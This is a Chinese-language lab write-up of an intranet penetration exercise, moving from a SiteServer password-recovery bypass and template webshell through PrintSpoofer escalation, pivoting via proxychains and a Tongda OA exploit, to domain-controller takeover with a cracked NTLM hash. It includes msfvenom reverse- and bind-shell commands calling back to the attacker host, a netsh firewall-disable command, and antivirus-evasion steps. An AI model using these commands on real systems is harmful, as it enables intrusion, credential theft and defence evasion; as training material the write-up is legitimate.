首先環(huán)境配置

VMware的網(wǎng)絡(luò)配置圖

環(huán)境拓?fù)鋱D

開始滲透

信息收集

使用kali掃描一下靶機的IP地址

靶機IP：192.168.0.114
攻擊機IP：192.168.0.109
獲取到了ip地址之后，我們掃描一下靶機開放的端口

靶機開放了21,80,999,3389,5985,6588端口

使用masscan掃描的時候，rate不要改那么大，不然可能會被攔截，導(dǎo)致掃描出來的結(jié)果不完全

根據(jù)開放的端口使用nmap進(jìn)行進(jìn)一步的掃描

好像有很多個httpd服務(wù)，我們從80開始試
直接訪問是行不通的，我們需要編輯hosts給他解析一個域名
這個域名是題目給的www.moonlab.com
我們修改一下hosts文件后再去訪問

滲透開始

Web服務(wù)器

修改好之后我們訪問一下

訪問后發(fā)現(xiàn)是一片空白，根據(jù)習(xí)慣，對于web頁面，我們可以訪問一下robots.txt文件

有三個目錄，我們首先訪問第一個/SiteServer/

是一個siteserver的登錄界面，并且版本號為3.6.4我們查一下有關(guān)這個框架的漏洞
找到了一個能跳過回答問題直接獲得管理員密碼的漏洞

https://cn-sec.com/archives/71636.html

說直接禁用js即可獲得管理員密碼

這里答案選擇空，然后使用插件把js禁用點下一步即可獲得admin的密碼

我們使用這個密碼去登錄一下

成功登錄到后臺，我們看看有沒有什么地方可以上傳shell的

ps:這里跟WordPress上傳shell一樣，我發(fā)現(xiàn)的有兩個地方可以上傳
1.可以把shell打包成一個主題文件zip，上傳之后解壓，就可以獲得shell
2.找到可以直接修改文件的地方，把代碼修改成我們的惡意代碼也可以實現(xiàn)
我這里使用的第二種方法

我們找一下哪個地方可以修改文件

有一個T_xxx.aspx的文件，是首頁的默認(rèn)模板，意思就是我們直接修改T_xxx.aspx這個文件，再訪問www.moonlab.com就可以直接訪問到我們的shell了

這里我是用的冰蝎自帶的aspx的木馬，因為普通的一句話會被安全狗攔截下來
保存之后我們直接用冰蝎嘗試連接一下

如果用其他的工具，沒有通過處理的，很有可能會被防火墻把流量攔截下來

成功連接，我們看一下當(dāng)前的權(quán)限

是普通用戶的權(quán)限，我們嘗試一下提權(quán)，首先看一下服務(wù)器運行了些什么程序，開了什么服務(wù)

net start

開了安全狗、Defender、firewall、mysql和Print Spooler等服務(wù)
再看一下服務(wù)器系統(tǒng)版本

這樣我們可以根據(jù)開放的服務(wù)和系統(tǒng)版本查找一下可能的提權(quán)工具

我們可以利用print spooler服務(wù)進(jìn)行提權(quán)
去github上查找一下exp

https://github.com/whojeff/PrintSpoofer

把exp下載下來之后，直接上傳是不行的，因為有安全狗，會把我們上傳的惡意程序直接殺掉
我們需要自己做一下免殺

免殺可以參考這一篇文章
https://www.freebuf.com/articles/web/261444.html

做了免殺之后，我們把exp上傳到c:/windows/temp目錄下，因為這個目錄跟linux的/tmp差不多，我們可以有足夠的權(quán)限來上傳和執(zhí)行文件

成功上傳，我們嘗試使用一下這個程序進(jìn)行提權(quán)

提權(quán)成功，獲得到了system權(quán)限，我們把權(quán)限上線到msf
先在msf監(jiān)聽9999端口

然后冰蝎直接反彈shell回來

SYSTEM權(quán)限上線CS

我們首先要反彈一個system權(quán)限到msf，然后再派生到cs上
我們先使用msf創(chuàng)建一個反彈程序，然后看看能不能上傳成功，做一下免殺

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=2333 -e x86/shikata_ga_nai -i 20 -f c -o payload3.c

生成成功后，用工具做一下免殺，然后上傳測試


成功上傳了，然后我們使用dayu.exe提權(quán)運行一下

終于反彈成功，我們把權(quán)限派生到cs吧

use exploit/windows/local/payload_inject
set lhost 192.168.0.109 #此處跟cs監(jiān)聽器一樣
set lport 6060 #此處跟cs監(jiān)聽器一樣
set session 6 #跟自己獲得的session的id一致
run

成功上線到cs
我們查看一下他的網(wǎng)卡，進(jìn)行進(jìn)一步滲透

發(fā)現(xiàn)還有一張10.10.1.0/24網(wǎng)段的網(wǎng)卡，我們添加一下路由

使用arp掃描一下這個網(wǎng)段下還有什么別的主機

掃描出來還有一個10.10.1.130的主機，我們使用msf創(chuàng)建一個通往10.10.1.0/24的代理

修改一下/etc/proxychains4.conf文件

然后使用命令測試一下連通性

proxychains4 curl 10.10.1.130

成功返回了，我們掃描一下主機開放的端口

proxychains4 nmap -Pn -sT -sV 10.10.1.130

發(fā)現(xiàn)只對外開放了80端口，我們用網(wǎng)站訪問一下

proxychains4 firefox 10.10.1.130

發(fā)現(xiàn)是一個通達(dá)OA的系統(tǒng)，并且是2020年的，這個系統(tǒng)是存在漏洞的

OA系統(tǒng)

我們?nèi)グ俣炔樵円幌逻@個系統(tǒng)的漏洞
找到一個工具

成功上傳，我們用蟻劍嘗試一下連接

注意，windows需要使用代理才可以連上10網(wǎng)段

成功連上，但是蟻劍并不能執(zhí)行命令

我們上傳一個冰蝎的馬，然后用冰蝎連接吧

連接

連接成功，并且是system權(quán)限，很不錯，我們查看一下IP地址

發(fā)現(xiàn)有兩張網(wǎng)卡，另外一張是10.10.10.0/24網(wǎng)段的，這應(yīng)該就是域控在的網(wǎng)段了，現(xiàn)在我們嘗試拿下域控

拿下域控

搭建代理

先弄一個能到達(dá)域控網(wǎng)段的代理

開放了445端口，如果可以利用的話，我們就不用搞二層代理了，方便一點，但是我們之前掃描的時候，只能掃描到80端口，猜測是防火墻攔截了，我們用命令把防火墻關(guān)閉一下

NetSh Advfirewall set allprofiles state off

關(guān)閉成功，我們重新掃描一下445端口

成功開放了
我們使用msf生成一個攻擊載荷，然后繼續(xù)用工具進(jìn)行一下免殺

msfvenom -p windows/meterpreter/bind_tcp LPORT=6666 -e x86/shikata_ga_nai -i 15 -f csharp -o payload_bind.txt

上傳試試

看起來好像沒被殺掉，我們嘗試連接一下
先在msf開啟監(jiān)聽

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.1.130
set lport 6666
run

成功連接

開始滲透

看看現(xiàn)在處于哪個域下面

域名是dc.attack.local
現(xiàn)在就是需要做域內(nèi)信息收集了，可以用cs的beacon也可以直接使用msf的模塊，我這里直接使用的msf的模塊

meterpreter > run post/windows/gather/enum_domain

查詢到域控的ip地址
我們再看看域有哪些用戶登錄著，域控有什么用戶


發(fā)現(xiàn)本機的進(jìn)程有域管理員，我們添加一下通往10.10.10.0/24的路由，探測一下域控端口開放信息

然后使用命令

proxychains4 nmap -sT -Pn 10.10.10.165 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,88,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

探測一下服務(wù)器開放的端口

開了445和3389端口
我們首先要登錄域控，我們獲取一下用戶的PID和SID的NTML

小插曲

我們需要登錄web服務(wù)器先把他的防護(hù)軟件全部關(guān)掉，然后再去獲取ntml

拿到之后我們就可以嘗試登錄域控管理員了

破解HTLM

我們使用在線網(wǎng)站解密一下ntlm，看看能不能獲得密碼

成功獲取到密碼，我們用windows遠(yuǎn)程登錄一下

出現(xiàn)這個，我們需要修改一下遠(yuǎn)程桌面的設(shè)置

可以參考這篇文章https://blog.csdn.net/qq_32682301/article/details/116003700

修改好之后我們就可以登錄了

成功獲取到flag

總結(jié)

這一次的內(nèi)網(wǎng)滲透讓我學(xué)到了很多新的東西，中間也遇到了很多的困難，不會的地方，不過好在網(wǎng)上有很多大佬已經(jīng)做過writeup了，讓我這個菜雞不至于卡死
現(xiàn)在把整個流程都寫下來吧

siteserver的找回密碼漏洞，SQL注入漏洞（雖然沒用上），通過siteserver上傳一個webshell，獲得普通權(quán)限
然后看一下系統(tǒng)版本信息為2016，再看看服務(wù)器開了什么服務(wù)，開了什么端口，有什么可能存在漏洞的點，然后根據(jù)這些東西去查詢2016有什么漏洞可以利用
然后發(fā)現(xiàn)了有一個Print Spooler的提權(quán)漏洞，但是直接上傳poc是不行的，因為有安全狗，Windows Defender的防護(hù)，直接上傳，就會導(dǎo)致立馬被殺，所以我們需要做一下免殺處理
參考這篇文章https://www.freebuf.com/articles/web/261444.html
然后把shell反彈到msf或者上線cs都是可以的，上傳一個msf生成的攻擊模塊，也是需要進(jìn)行免殺，以下省略
探測一下內(nèi)網(wǎng)內(nèi)別的網(wǎng)段，進(jìn)行進(jìn)一步的滲透
發(fā)現(xiàn)是一個通達(dá)OA的系統(tǒng)（剛好我知道這個漏洞）然后就是通達(dá)OA系統(tǒng)的滲透，提權(quán)
再通過正向代理連接到msf上，然后繼續(xù)滲透，看看別的網(wǎng)段，找到之后，看看域的名稱，域控的IP，有什么用戶登錄了，并且有什么可能可以利用的點，進(jìn)行利用
一步一步進(jìn)行權(quán)限的提升

學(xué)了很多東西，尤其是有關(guān)域內(nèi)滲透還有免殺方面（上傳的時候卡了我好久QAQ）的東西，讓我學(xué)到了新的知識，新的工具，

可能有人說，最后直接用密碼登錄的，沒啥含金量，其實我也試過別的方法，pth登錄，還有msf的psexec模塊等，但都沒有成功QAQ
好啦，就這樣吧
學(xué)而時習(xí)之，不亦說乎